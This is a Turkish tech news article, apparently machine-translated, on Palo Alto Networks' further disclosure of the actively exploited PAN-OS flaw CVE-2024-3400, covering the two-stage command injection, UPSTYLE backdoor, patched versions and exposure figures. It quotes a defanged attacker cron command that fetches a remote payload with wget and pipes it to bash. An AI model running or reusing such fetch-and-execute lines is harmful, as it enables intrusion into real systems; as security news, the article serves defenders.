Teknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor Haberleri
Yazı Tipi BoyutlandırıcıAa
  • Anasayfa
  • Teknoloji
    • Siber Güvenlik
    • Yapay Zeka
    • Donanım
    • Bilim
  • Yazılım
  • Savunma & İstihbarat
  • Oyun
  • Yaşam
    • Finans
    • Sinema
    • Dünyadan Haberler
  • İş Birliği
Okuma: Palo Alto Networks, Saldırı Altındaki Kritik PAN-OS Kusuruna İlişkin Daha Fazla Detayı Açıkladı
Paylaş
Yazı Tipi BoyutlandırıcıAa
Teknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor Haberleri
Ara
Bizi Takip Et
  • Hakkımızda
  • Gizlilik politikası
  • Tanıtım Yazısı ve Backlink Hizmeti
© 2026 Teknomers. All Rights Reserved.

Anasayfa » Palo Alto Networks, Saldırı Altındaki Kritik PAN-OS Kusuruna İlişkin Daha Fazla Detayı Açıkladı

GenelSiber Güvenlik

Palo Alto Networks, Saldırı Altındaki Kritik PAN-OS Kusuruna İlişkin Daha Fazla Detayı Açıkladı

teknomers
Son güncelleme: 20 Nisan 2024 12:41
teknomers
Paylaş
Paylaş


20 Nis 2024Haber odasıGüvenlik Açığı / Ağ Güvenliği

Palo Alto Networks, kötü niyetli aktörler tarafından aktif olarak istismar edilen PAN-OS’u etkileyen kritik bir güvenlik kusurunun daha fazla ayrıntısını paylaştı.

Şirket, şu şekilde takip edilen güvenlik açığını açıkladı: CVE-2024-3400 (CVSS puanı: 10.0), “karmaşık” ve yazılımın PAN-OS 10.2, PAN-OS 11.0 ve PAN-OS 11.1 sürümlerindeki iki hatanın birleşimi olarak.

Palo Alto Networks ürün güvenliği kıdemli müdürü Chandan BN, “İlkinde, GlobalProtect hizmeti, oturum kimliği biçimini saklamadan önce yeterince doğrulamadı. Bu, saldırganın, saldırganın seçtiği dosya adıyla boş bir dosya depolamasına olanak sağladı.” söz konusu.

“İkinci hata (dosyaların sistem tarafından oluşturulduğuna güvenerek) dosya adlarını bir komutun parçası olarak kullandı.”

Sorunların hiçbiri tek başına yeterince kritik olmasa da, bir araya getirildiklerinde kimlik doğrulaması yapılmadan uzak kabuk komutlarının yürütülmesine yol açabileceklerini belirtmekte fayda var.

Palo Alto Networks, kusurun sıfır gün istismarının arkasındaki tehdit aktörü UTA0218’in, duyarlı cihazlarda komut yürütmeyi gerçekleştirmek için iki aşamalı bir saldırı gerçekleştirdiğini söyledi. Etkinlik MidnightEclipse Operasyonu adı altında takip ediliyor.

Daha önce hem Volexity hem de ağ güvenliği şirketinin kendi Birim 42 tehdit istihbaratı bölümü tarafından açıklandığı gibi, bu, yürütülecek komutu içeren özel hazırlanmış isteklerin gönderilmesini ve daha sonra UPSTYLE adı verilen bir arka kapı aracılığıyla çalıştırılmasını içeriyor.

Volexity geçen hafta şunları kaydetti: “UTA0218’in ilk kalıcılık mekanizması kurulumu, çıktısının stdout’a yazıldığı ve yürütülmek üzere bash’a aktarıldığı, saldırgan tarafından kontrol edilen bir URL’den bir yük almak için wget’i kullanacak bir cron işinin yapılandırılmasını içeriyordu.”

“Saldırgan bu yöntemi belirli komutları dağıtmak ve yürütmek ve GOST (GO Basit Tünel) gibi ters proxy araçlarını indirmek için kullandı.”

Birim 42, bu mekanizma aracılığıyla yürütülen komutları belirleyemediğini söyledi – wget -qO- hxxp://172.233.228[.]93/politika | bash – ancak cron işi tabanlı implantın muhtemelen kullanım sonrası faaliyetleri yürütmek için kullanıldığı değerlendirildi.

Chandan, “1. aşamada saldırgan geçerli bir oturum kimliği yerine dikkatlice hazırlanmış bir kabuk komutunu GlobalProtect’e gönderir” diye açıkladı. “Bu, saldırganın seçtiği dosya adı gömülü bir komutla sistemde boş bir dosya oluşturulmasına neden oluyor.”

“2. aşamada, düzenli olarak çalışan, şüphelenmeyen zamanlanmış bir sistem işi, bir komutta saldırgan tarafından sağlanan dosya adını kullanır. Bu, saldırgan tarafından sağlanan komutun yükseltilmiş ayrıcalıklarla yürütülmesiyle sonuçlanır.”

Palo Alto Networks başlangıçta CVE-2024-3400’ün başarılı bir şekilde kullanılmasının GlobalProtect ağ geçidi veya GlobalProtect portalı (veya her ikisi) için güvenlik duvarı yapılandırmalarının ve cihaz telemetrisinin etkinleştirilmesini gerektirdiğini belirtmiş olsa da, şirket daha sonra cihaz telemetrisinin sorunla hiçbir ilgisi olmadığını doğruladı.

Bu dayanmaktadır yeni bulgular Bishop Fox, bir cihaza sızmak için telemetrinin etkinleştirilmesini gerektirmeyecek şekilde kusuru silah haline getirmek için bypass’lar keşfetti.

Şirket ayrıca genişletilmiş yamalar Son birkaç gündeki kusurun yaygın olarak kullanılan diğer bakım sürümlerini kapsaması nedeniyle –

  • PAN-OS 10.2.9-h1
  • PAN-OS 10.2.8-h3
  • PAN-OS 10.2.7-h8
  • PAN-OS 10.2.6-h3
  • PAN-OS 10.2.5-h6
  • PAN-OS 10.2.4-h16
  • PAN-OS 10.2.3-h13
  • PAN-OS 10.2.2-h5
  • PAN-OS 10.2.1-h2
  • PAN-OS 10.2.0-h3
  • PAN-OS 11.0.4-h1
  • PAN-OS 11.0.4-h2
  • PAN-OS 11.0.3-h10
  • PAN-OS 11.0.2-h4
  • PAN-OS 11.0.1-h4
  • PAN-OS 11.0.0-h3
  • PAN-OS 11.1.2-h3
  • PAN-OS 11.1.1-h1
  • PAN-OS 11.1.0-h3

CVE-2024-3400’ün aktif olarak kötüye kullanılması ve kavram kanıtlama (PoC) yararlanma kodunun mevcut olması ışığında, kullanıcıların olası tehditlere karşı korunmak amacıyla düzeltmeleri mümkün olan en kısa sürede uygulamak için gerekli adımları atmaları önerilir.

ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA) da bu açığı Bilinen Suistimal Edilen Güvenlik Açıkları (KEV) kataloğuna ekleyerek federal kurumlara cihazlarını 19 Nisan 2024’e kadar koruma altına almalarını emretti.

Buna göre bilgi Shadowserver Foundation tarafından paylaşılan bilgiye göre, yaklaşık 22.542 internete açık güvenlik duvarı cihazı muhtemelen CVE-2024-3400’e karşı savunmasızdır. A cihazların çoğunluğu 18 Nisan 2024 itibarıyla ABD, Japonya, Hindistan, Almanya, Birleşik Krallık, Kanada, Avustralya, Fransa ve Çin’de bulunmaktadır.





siber-2

Windows 11 Başlat menüsü değişikliğine yönelik tepkilerin ardından Microsoft, yeni önizleme sürümünde rotasını değiştiriyor
Rusya’ya düşmanca davranılırsa, Rusya Federasyonu’nun yeni uzay istasyonu askeri olarak uygulanacak
Etik bulutun temellerinden biri olan gizliliğe güven ve saygı
Silicon Vadisi’nde Tartışmalara Neden Olan Otomasyon Girişimi: Mechanize
En iyi MW3 AMR9 donanımı ve sınıf kurulumu
ETİKETLENDİ:açıkladıağ güvenliğialtındakiAltobilgi Güvenliğibilgisayar GüvenliğiDahadetayıFazlafidye yazılımı kötü amaçlı yazılımhack haberlerihacker haberleriİlişkinKritikKusurunaNasıl heklenirNetworksPaloPANOSsaldırısiber güncellemelersiber güvenlik güncellemelerisiber güvenlik haberleriSiber güvenlik haberleri bugünSiber Haberlersiber saldırılarveri ihlaliyazılım güvenlik açığı
Bu Makaleyi Paylaş
Facebook Bağlantıyı Kopyala Yazdır
Paylaş
Önceki Makale Elliot Page, ‘Dışımızdaki Karanlık’ Bilim Kurgu Romanını Uzun Metraj Olarak Geliştiriyor (Özel)
Sonraki Makale Rus bayiler “paralel” Nissan X-Trail’in fiyatlarını yeniden yazdı

Sanal Medya

FacebookBeğen
452Takip Et
PinterestSabitle
237Takip Et

Son Eklenenler

Kritik: Microsoft Defender ‘RoguePlanet’ Sıfır Gün Açığı ile Sistem İzni Tehlikesi
Siber Güvenlik
Kingdom Hearts Bulut Versiyonları Kapatıldı, Yenilerini Almak Gerekiyor
Oyun
App Store Abonelik Paketleri Yakında Geliyor
Liste
shadcn/ui ile yapılmış bir CMS var mı? Evet — UnfoldCMS
Yazılım
Acil: ServiceNow Güvenlik Olayı, Müşteri Verilerini Tehlikeye Attı
Siber Güvenlik
Akdeniz’de Milyonlarca Yıldır Var olan Kılıçbalığı Neden Bu Kadar Nadir Görülüyor?
Genel
//

Siber güvenlik, yapay zeka ve savunma sanayiinden; finans ve sinema dünyasına uzanan geniş bir yelpaze. Teknomers; teknoloji, strateji ve yazılım dünyasını sade bir dille sizlerle buluşturuyor.

Kurumsal

  • Hakkımızda
  • Gizlilik politikası
  • Tanıtım Yazısı ve Backlink Hizmeti

Kategoriler

  • Teknoloji
  • Oyun
  • Sinema
  • Siber Güvenlik
  • Bilim
  • Finans
  • Dünyadan Güncel Haberler

Populer

  • TV'de Ücretsiz İzlenebilen Şifresiz Erotik Kanallar (2025 Güncel Frekans Listesi)

  • The Last of Us PC Kontrolleri: Hızlı Silah Değiştirme ve Tüm Tuşlar (2025)

  • Hogwarts Legacy'de Odaklanma İksiri Nasıl Yapılır?

Teknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor Haberleri
Bizi Takip Et
© 2026 Teknomers. All Rights Reserved.
Welcome Back!

Sign in to your account

Kullanıcı Adı veya E-posta Adresi
Şifre

Şifrenizi mi unuttunuz?